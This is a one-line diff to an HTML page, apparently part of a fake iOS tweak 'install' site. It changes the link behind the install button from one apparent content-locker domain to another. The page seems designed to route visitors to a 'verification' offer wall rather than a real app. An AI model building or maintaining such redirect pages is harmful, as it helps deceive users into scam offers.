--- a/itweakvip/OGInject/crab.html
+++ b/itweakvip/OGInject/crab.html
@@ -135,7 +135,7 @@
         id("app_name").innerHTML = name;
         id("app-caption-title").innerHTML = name;
 
-        window.lcr = "https://downloadlocked.com/cl/i/995vpl";
+        window.lcr = "https://verifysuper.com/cl/i/klpd5q";
         id("install").style.display = "block";
     }
 
